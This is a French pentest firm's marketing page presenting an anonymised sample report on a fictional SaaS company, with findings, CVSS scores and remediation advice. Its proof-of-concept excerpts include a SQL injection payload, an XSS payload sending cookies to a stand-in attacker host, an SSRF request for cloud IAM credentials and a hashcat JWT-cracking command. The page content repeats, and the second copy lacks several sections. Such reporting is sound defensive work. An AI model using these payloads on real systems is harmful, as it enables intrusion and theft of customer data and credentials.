Le rapport est-il vraiment exploitable par une équipe non-sécurité ?

Oui. Chaque rapport contient un résumé exécutif (1 à 2 pages, sans jargon) pour la direction et un rapport technique détaillé pour l'équipe IT/dev. Chaque vulnérabilité a un scoring CVSS, un impact métier expliqué et une recommandation de remédiation actionnable.

Les exemples de vulnérabilités présentés sont-ils réels ?

Ce sont des exemples anonymisés inspirés de missions réelles. Les URLs, paramètres, payloads et identifiants ont été modifiés. La structure du rapport et le niveau de détail correspondent à ce que vous recevez en mission.

Combien de temps après la mission le rapport est-il livré ?

Le rapport final est livré 48 à 72 heures après la fin de la mission. Les vulnérabilités critiques sont signalées immédiatement par mail sécurisé pendant la mission.

Le re-test est-il inclus ?

Oui, selon la mission. Le re-test valide la remédiation des vulnérabilités critiques et hautes, et est attesté par un avenant au rapport initial avec mention « Corrigé et vérifié ».

Puis-je voir un rapport complet avant de commander ?

Le PDF d'exemple public est téléchargeable directement sur cette page. Un échantillon issu d'une mission réelle peut être partagé sous NDA, sur demande à sales@laucked.com.

Exemple anonymisé · PDF téléchargeable

Exemple de rapport de pentest

Rapport fictif sur AcmeFictio SAS, éditeur SaaS B2B. Vous y trouvez la structure complète d'un livrable Laucked : résumé exécutif, vulnérabilités détaillées avec preuves de concept, scoring CVSS, plan de remédiation priorisé sur 60 jours et re-test inclus.

Rayan DibOSCPOSEP·CTO & co-fondateur - Laucked

Pentest web & API, audit IA, Toulouse, méthodologie OWASP/PTES

Mise à jour mai 2026·8 min de lecture·Fondateurs·LinkedIn

LAUCKED

Diagnostic et
test d'intrusion

AcmeFictio SAS
Exemple anonymisé

// EXEMPLE PUBLIClaucked.com

Télécharger le PDF d'exemple

Fichier complet, sans formulaire, sans email demandé. Diffusion libre avec mention de la source.

23 pages A41,4 MoOWASP · PTES · CVSS v3.1

Télécharger le PDF Ouvrir dans le navigateur

findings

critique

élevés

moyens

faibles

informatifs

OSCP · OSEP · OSWE

NDA avant échange

Méthodologie OWASP / PTES

Rapport exécutif + technique

Re-test inclus

Basé en France

Livrables

Ce que vous recevez à la fin d'une mission

Le rapport est le seul livrable qui survit à la mission. Il doit être lisible par votre direction comme par votre équipe technique, exploitable sans expert en sécurité interne, et conserver une traçabilité jusqu'au re-test.

Résumé exécutif (1 à 2 pages)

Note de risque consolidée, vulnérabilités critiques et hautes par impact métier. Lisible par une direction non technique.

Rapport technique détaillé

Chaque vulnérabilité : description, contexte, preuve de concept reproductible, scoring CVSS, impact, recommandation de remédiation.

Preuves d'exploitation

Captures, requêtes, payloads ou snippets de code permettant de reproduire la faille. Stockés en annexe chiffrée.

Plan de remédiation priorisé

Liste actionnable triée par sévérité × effort, avec corrections de référence (CWE / OWASP) et chemin de validation.

Re-test et attestation

Validation après correction des vulnérabilités critiques et hautes. Avenant au rapport mentionnant « Corrigé et vérifié » par item.

Extrait synthèse exécutive

Ce que lit la direction en 5 minutes

Extrait anonymisé d'une synthèse dirigeant. Score, KPIs critiques, décisions priorisées, puis tableau de remédiation. Lisible sans expert en sécurité.

Synthèse exécutive. AcmeFictio SAS

LAUCK-EXEMPLE-PUBLIC-2026 · 2 pages dirigeant

Score C+

C+

Score global

Correction sous 30 j recommandée

Findings consolidés

1 critique · 4 élevés · 8 moyens · 6 faibles/info

8–12 j-h

Effort de remédiation

Réparti sur 4 sprints

1–2 j-h

Retest validation

Inclus dans la mission

Décisions à prendre· 3 axes

À traiter avant production

L'injection SQL sur l'API de recherche (F-001) doit être corrigée avant toute mise en prod additionnelle. Les requêtes paramétrées + whitelist côté contrôleur résolvent le risque structurel.

À cadrer sur les 14 jours

La vérification d'appartenance tenant manquante (F-002) ouvre un risque cross-tenant. Refactor au niveau du contrôleur + UUID v4 sur les identifiants exposés. Effort estimé : 2 à 3 j-h.

À prévoir au sprint suivant

Migration JWT vers signature asymétrique (RS256/EdDSA) avec stockage clé dans un KMS (F-005). Effort 1 à 2 j-h + tests régression. Pas d'urgence J0 mais bloquant pour la certif client.

Plan de remédiation priorisé· 8 lignes représentatives

Priorité	Finding	Sévérité	Effort	Responsable	Échéance	Re-test
P0	Injection SQL sur /api/v1/documents/search F-001	Critique · CVSS 9.1	1 j-h	Backend lead	J + 7	Corrigé
P0	BOLA sur /api/v1/documents/{id} F-002	Élevée · CVSS 8.2	2 à 3 j-h	Backend lead	J + 14	Corrigé
P1	XSS persistante back-office F-003	Élevée · CVSS 7.4	1 à 2 j-h	Frontend lead	J + 14	Corrigé
P1	SSRF via import image distante F-004	Élevée · CVSS 7.5	1 à 2 j-h	Backend + DevOps	J + 30	Corrigé
P2	JWT HS256 secret faible F-005	Moyenne · CVSS 6.4	1 à 2 j-h + KMS setup	DevOps + Backend	J + 30	En cours
P2	Headers sécurité incomplets F-006	Moyenne · CVSS 5.3	0,5 j-h	DevOps	J + 30	Corrigé
P2	Énumération comptes (mot de passe oublié) F-007	Moyenne · CVSS 5.3	0,5 j-h	Backend	J + 60	Planifié
P2	Rate-limit absent sur auth F-008	Moyenne · CVSS 5.9	1 j-h	Backend	J + 60	Planifié

Tableau livré au format exploitable (CSV + PDF). Le statut « Re-test » est mis à jour par Laucked après vérification de la correction à J + 30. Score consolidé attendu après remédiation complète : A−.

Sommaire type

Structure du rapport, section par section

Chaque rapport suit une structure constante pour faciliter la relecture année après année et la comparaison de l'évolution de votre posture de sécurité.

1. Synthèse exécutive

Score de risque global et tendance
Top 5 des vulnérabilités à corriger en priorité
Recommandations pour la direction (budget, planning, gouvernance)

2. Périmètre et méthodologie

Liste des cibles, URLs, environnements
Méthodologie OWASP Top 10 / OWASP API Top 10 / PTES
Fenêtre de test et règles d'engagement

3. Vulnérabilités détaillées

Description, contexte et conditions d'exploitation
Preuve de concept reproductible
Scoring CVSS v3.1 (base + temporel + environnemental)
Impact métier explicité
Recommandation de remédiation actionnable

4. Annexes techniques

Inventaire des actifs scannés
Détail des outils et payloads
Logs d'exécution synthétiques
Captures d'écran et requêtes brutes

Findings types

Cinq exemples de vulnérabilités commentées

Exemples anonymisés inspirés de missions réelles. URLs, paramètres et identifiants modifiés. Le niveau de détail correspond à ce que vous recevez en mission.

LCK-2026-001CritiqueCVSS 9.1Corrigé et vérifié

Injection SQL sur paramètre `id` de l'API commandes

Contexte

L'endpoint `GET /api/orders/{id}` concaténait directement le paramètre dans une requête SQL sans préparation. Le client passait par un cookie d'authentification valide mais n'avait pas besoin d'élévation de privilège.

Impact métier

Exfiltration possible de l'intégralité de la base clients, incluant emails, hashes de mots de passe et adresses postales. Risque de fuite massive et de non-conformité RGPD.

Extrait de preuve d'exploitation (anonymisé)

GET /api/orders/1' UNION SELECT user,pwd FROM users-- HTTP/1.1
Host: app.client.example
Cookie: session=eyJ...

Recommandation de remédiation

Utiliser systématiquement des requêtes paramétrées (prepared statements). Ajouter un test d'intégrité d'entrée (`uuid` strict) et un WAF en complément, jamais comme défense principale.

LCK-2026-002CritiqueCVSS 8.6Corrigé et vérifié

BOLA, autorisation manquante sur `/api/invoices/{id}`

Contexte

Un utilisateur authentifié pouvait accéder à n'importe quelle facture en incrémentant l'identifiant numérique. Aucune vérification que la facture appartenait bien au tenant de l'utilisateur connecté.

Impact métier

Lecture de toutes les factures de tous les tenants. Concurrence directe : un client pouvait lire les contrats d'un autre client de la plateforme. Impact contractuel et réputationnel majeur.

Extrait de preuve d'exploitation (anonymisé)

GET /api/invoices/40217 HTTP/1.1
Authorization: Bearer eyJ...userA
→ HTTP 200, JSON facture du client B

Recommandation de remédiation

Ajouter une vérification d'appartenance au tenant au niveau du contrôleur (et non du seul middleware d'authentification). Préférer un UUID v4 non-énumérable pour les identifiants exposés.

LCK-2026-003ÉlevéeCVSS 7.3Corrigé et vérifié

XSS persistante via champ « commentaire » du back-office

Contexte

Le champ commentaire d'une commande, saisi par un opérateur interne, était rendu sans échappement dans le tableau de bord des administrateurs. Le contenu était stocké en base et servait à plusieurs utilisateurs.

Impact métier

Vol de session d'administrateur via XSS persistante. Une fois la session compromise, élévation vers une prise de contrôle complète du back-office.

Extrait de preuve d'exploitation (anonymisé)

POST /api/orders/4017/comments { "text": "<img src=x onerror=fetch('//attacker/?c='+document.cookie)>" }
→ Cookie d'admin exfiltré au prochain affichage du back-office

Recommandation de remédiation

Échapper systématiquement le rendu HTML (utiliser un moteur de templates par défaut sécurisé). Mettre en place une CSP stricte (`script-src 'self'`). Cookie de session `HttpOnly` + `SameSite=Strict`.

LCK-2026-004ÉlevéeCVSS 7.5Corrigé et vérifié

SSRF via la fonction d'import d'images distantes

Contexte

L'application permettait d'importer une image depuis une URL fournie par l'utilisateur. Aucune validation du schéma ni de la destination, et le serveur tournait en environnement cloud avec un IMDS accessible.

Impact métier

Récupération de credentials IAM temporaires de l'instance, permettant un pivot vers les buckets S3, Lambda et bases de données rattachées au compte cloud.

Extrait de preuve d'exploitation (anonymisé)

POST /api/uploads/import { "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" }
→ HTTP 200, credentials IAM temporaires exfiltrées

Recommandation de remédiation

Whitelister les schémas (`https://` uniquement), bloquer les IPs RFC1918 et 169.254.0.0/16 côté serveur. Désactiver IMDSv1, forcer IMDSv2 avec hop-limit=1.

LCK-2026-005MoyenneCVSS 6.4En cours

JWT signés avec un secret faible, exposés au brute-force

Contexte

Les JWT d'authentification étaient signés en HS256 avec un secret de 8 caractères présent en variable d'environnement de l'application. Le secret était dérivé d'un mot de dictionnaire avec suffixe numérique.

Impact métier

Forge de tokens valides pour n'importe quel utilisateur, y compris administrateurs. Compromission totale de la couche d'authentification.

Extrait de preuve d'exploitation (anonymisé)

hashcat -m 16500 jwt.txt rockyou.txt -r best64.rule
→ Secret cassé en 14 minutes sur GPU grand public

Recommandation de remédiation

Migrer vers une signature asymétrique (RS256 ou EdDSA) avec rotation régulière des clés. Stocker les secrets dans un KMS / vault dédié. Forcer une durée de vie courte (15 min) avec refresh tokens révocables.

Référentiels

Méthodologie et scoring

OWASP Top 10 & API Top 10

Référentiels de catégorisation. Chaque vulnérabilité est rattachée à un identifiant OWASP / CWE pour faciliter la remédiation et l'audit.

PTES (Penetration Testing Execution Standard)

Méthodologie d'exécution : reconnaissance, modélisation des menaces, analyse de vulnérabilités, exploitation, post-exploitation, rapport.

CVSS v3.1 (base + temporel + environnemental)

Scoring standard utilisé pour prioriser les vulnérabilités. Inclut l'ajustement contextuel à votre environnement réel, pas seulement le score de base.

Aller plus loin

Le PDF d'exemple est public. Pour voir votre propre exposition, le chemin le plus rapide est un diagnostic de surface, gratuit, restitué sous 48 à 72 heures. Pas de carte bancaire, pas d'obligation de pentest derrière.

Télécharger le PDF Lancer le diagnostic gratuit

Vous voulez voir un rapport issu d'une vraie mission ? Demander un échantillon sous NDA.

Exemple de diagnostic de surface

Le livrable en amont d'un pentest. Cartographie publique, 12 observations, recommandation GO ou NO-GO.

Méthodologie complète

OWASP, PTES, CVSS, règles d'engagement, livrables, retest. Le détail de comment on travaille.

Tous les exemples présentés ci-dessus sont anonymisés et synthétisés à partir de missions réelles. Les URLs, paramètres, identifiants et payloads ont été modifiés. Ce document est une vue partielle d'un rapport réel, pas un échantillon complet ni un modèle générique réutilisable.

Exemple anonymisé · PDF téléchargeable

Exemple de rapport de pentest

Rayan DibOSCPOSEP·CTO & co-fondateur - Laucked

Pentest web & API, audit IA, Toulouse, méthodologie OWASP/PTES

Mise à jour mai 2026·8 min de lecture·Fondateurs·LinkedIn

LAUCKED

Diagnostic et
test d'intrusion

AcmeFictio SAS
Exemple anonymisé

// EXEMPLE PUBLIClaucked.com

Télécharger le PDF d'exemple

Fichier complet, sans formulaire, sans email demandé. Diffusion libre avec mention de la source.

23 pages A41,4 MoOWASP · PTES · CVSS v3.1

Télécharger le PDF Ouvrir dans le navigateur

findings

critique

élevés

moyens

faibles

informatifs

OSCP · OSEP · OSWE

NDA avant échange

Méthodologie OWASP / PTES

Rapport exécutif + technique

Re-test inclus

Basé en France

Livrables

Ce que vous recevez à la fin d'une mission

Résumé exécutif (1 à 2 pages)

Note de risque consolidée, vulnérabilités critiques et hautes par impact métier. Lisible par une direction non technique.

Rapport technique détaillé

Chaque vulnérabilité : description, contexte, preuve de concept reproductible, scoring CVSS, impact, recommandation de remédiation.

Preuves d'exploitation

Captures, requêtes, payloads ou snippets de code permettant de reproduire la faille. Stockés en annexe chiffrée.

Plan de remédiation priorisé

Liste actionnable triée par sévérité × effort, avec corrections de référence (CWE / OWASP) et chemin de validation.

Re-test et attestation

Validation après correction des vulnérabilités critiques et hautes. Avenant au rapport mentionnant « Corrigé et vérifié » par item.

Extrait synthèse exécutive

Ce que lit la direction en 5 minutes

Extrait anonymisé d'une synthèse dirigeant. Score, KPIs critiques, décisions priorisées, puis tableau de remédiation. Lisible sans expert en sécurité.

Synthèse exécutive. AcmeFictio SAS

LAUCK-EXEMPLE-PUBLIC-2026 · 2 pages dirigeant

Score C+

C+

Score global

Correction sous 30 j recommandée

Findings consolidés

1 critique · 4 élevés · 8 moyens · 6 faibles/info

8–12 j-h

Effort de remédiation

Réparti sur 4 sprints

1–2 j-h

Retest validation

Inclus dans la mission

Décisions à prendre· 3 axes

À traiter avant production

L'injection SQL sur l'API de recherche (F-001) doit être corrigée avant toute mise en prod additionnelle. Les requêtes paramétrées + whitelist côté contrôleur résolvent le risque structurel.

À cadrer sur les 14 jours

La vérification d'appartenance tenant manquante (F-002) ouvre un risque cross-tenant. Refactor au niveau du contrôleur + UUID v4 sur les identifiants exposés. Effort estimé : 2 à 3 j-h.

À prévoir au sprint suivant

Migration JWT vers signature asymétrique (RS256/EdDSA) avec stockage clé dans un KMS (F-005). Effort 1 à 2 j-h + tests régression. Pas d'urgence J0 mais bloquant pour la certif client.

Plan de remédiation priorisé· 8 lignes représentatives

Priorité	Finding	Sévérité	Effort	Responsable	Échéance	Re-test
P0	Injection SQL sur /api/v1/documents/search F-001	Critique · CVSS 9.1	1 j-h	Backend lead	J + 7	Corrigé
P0	BOLA sur /api/v1/documents/{id} F-002	Élevée · CVSS 8.2	2 à 3 j-h	Backend lead	J + 14	Corrigé
P1	XSS persistante back-office F-003	Élevée · CVSS 7.4	1 à 2 j-h	Frontend lead	J + 14	Corrigé
P1	SSRF via import image distante F-004	Élevée · CVSS 7.5	1 à 2 j-h	Backend + DevOps	J + 30	Corrigé
P2	JWT HS256 secret faible F-005	Moyenne · CVSS 6.4	1 à 2 j-h + KMS setup	DevOps + Backend	J + 30	En cours
P2	Headers sécurité incomplets F-006	Moyenne · CVSS 5.3	0,5 j-h	DevOps	J + 30	Corrigé
P2	Énumération comptes (mot de passe oublié) F-007	Moyenne · CVSS 5.3	0,5 j-h	Backend	J + 60	Planifié
P2	Rate-limit absent sur auth F-008	Moyenne · CVSS 5.9	1 j-h	Backend	J + 60	Planifié

Sommaire type

Structure du rapport, section par section

Chaque rapport suit une structure constante pour faciliter la relecture année après année et la comparaison de l'évolution de votre posture de sécurité.

1. Synthèse exécutive

Score de risque global et tendance
Top 5 des vulnérabilités à corriger en priorité
Recommandations pour la direction (budget, planning, gouvernance)

2. Périmètre et méthodologie

Liste des cibles, URLs, environnements
Méthodologie OWASP Top 10 / OWASP API Top 10 / PTES
Fenêtre de test et règles d'engagement

3. Vulnérabilités détaillées

Description, contexte et conditions d'exploitation
Preuve de concept reproductible
Scoring CVSS v3.1 (base + temporel + environnemental)
Impact métier explicité
Recommandation de remédiation actionnable

4. Annexes techniques

Inventaire des actifs scannés
Détail des outils et payloads
Logs d'exécution synthétiques
Captures d'écran et requêtes brutes

Findings types

Cinq exemples de vulnérabilités commentées

Exemples anonymisés inspirés de missions réelles. URLs, paramètres et identifiants modifiés. Le niveau de détail correspond à ce que vous recevez en mission.

LCK-2026-001CritiqueCVSS 9.1Corrigé et vérifié

Injection SQL sur paramètre `id` de l'API commandes

Contexte

Impact métier

Exfiltration possible de l'intégralité de la base clients, incluant emails, hashes de mots de passe et adresses postales. Risque de fuite massive et de non-conformité RGPD.

Extrait de preuve d'exploitation (anonymisé)

GET /api/orders/1' UNION SELECT user,pwd FROM users-- HTTP/1.1
Host: app.client.example
Cookie: session=eyJ...

Recommandation de remédiation

Utiliser systématiquement des requêtes paramétrées (prepared statements). Ajouter un test d'intégrité d'entrée (`uuid` strict) et un WAF en complément, jamais comme défense principale.

LCK-2026-002CritiqueCVSS 8.6Corrigé et vérifié

BOLA, autorisation manquante sur `/api/invoices/{id}`

Contexte

Impact métier

Lecture de toutes les factures de tous les tenants. Concurrence directe : un client pouvait lire les contrats d'un autre client de la plateforme. Impact contractuel et réputationnel majeur.

Extrait de preuve d'exploitation (anonymisé)

GET /api/invoices/40217 HTTP/1.1
Authorization: Bearer eyJ...userA
→ HTTP 200, JSON facture du client B

Recommandation de remédiation

Ajouter une vérification d'appartenance au tenant au niveau du contrôleur (et non du seul middleware d'authentification). Préférer un UUID v4 non-énumérable pour les identifiants exposés.

LCK-2026-003ÉlevéeCVSS 7.3Corrigé et vérifié

XSS persistante via champ « commentaire » du back-office

Contexte

Impact métier

Vol de session d'administrateur via XSS persistante. Une fois la session compromise, élévation vers une prise de contrôle complète du back-office.

Extrait de preuve d'exploitation (anonymisé)

POST /api/orders/4017/comments { "text": "<img src=x onerror=fetch('//attacker/?c='+document.cookie)>" }
→ Cookie d'admin exfiltré au prochain affichage du back-office

Recommandation de remédiation

LCK-2026-004ÉlevéeCVSS 7.5Corrigé et vérifié

SSRF via la fonction d'import d'images distantes

Contexte

Impact métier

Récupération de credentials IAM temporaires de l'instance, permettant un pivot vers les buckets S3, Lambda et bases de données rattachées au compte cloud.

Extrait de preuve d'exploitation (anonymisé)

POST /api/uploads/import { "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" }
→ HTTP 200, credentials IAM temporaires exfiltrées

Recommandation de remédiation

Whitelister les schémas (`https://` uniquement), bloquer les IPs RFC1918 et 169.254.0.0/16 côté serveur. Désactiver IMDSv1, forcer IMDSv2 avec hop-limit=1.

LCK-2026-005MoyenneCVSS 6.4En cours

JWT signés avec un secret faible, exposés au brute-force

Contexte

Impact métier

Forge de tokens valides pour n'importe quel utilisateur, y compris administrateurs. Compromission totale de la couche d'authentification.

Extrait de preuve d'exploitation (anonymisé)

hashcat -m 16500 jwt.txt rockyou.txt -r best64.rule
→ Secret cassé en 14 minutes sur GPU grand public

Recommandation de remédiation

Référentiels

Méthodologie et scoring

OWASP Top 10 & API Top 10

Référentiels de catégorisation. Chaque vulnérabilité est rattachée à un identifiant OWASP / CWE pour faciliter la remédiation et l'audit.

PTES (Penetration Testing Execution Standard)

Méthodologie d'exécution : reconnaissance, modélisation des menaces, analyse de vulnérabilités, exploitation, post-exploitation, rapport.

CVSS v3.1 (base + temporel + environnemental)

Scoring standard utilisé pour prioriser les vulnérabilités. Inclut l'ajustement contextuel à votre environnement réel, pas seulement le score de base.

Aller plus loin

Télécharger le PDF Lancer le diagnostic gratuit

Vous voulez voir un rapport issu d'une vraie mission ? Demander un échantillon sous NDA.

Exemple de diagnostic de surface

Le livrable en amont d'un pentest. Cartographie publique, 12 observations, recommandation GO ou NO-GO.

Méthodologie complète

OWASP, PTES, CVSS, règles d'engagement, livrables, retest. Le détail de comment on travaille.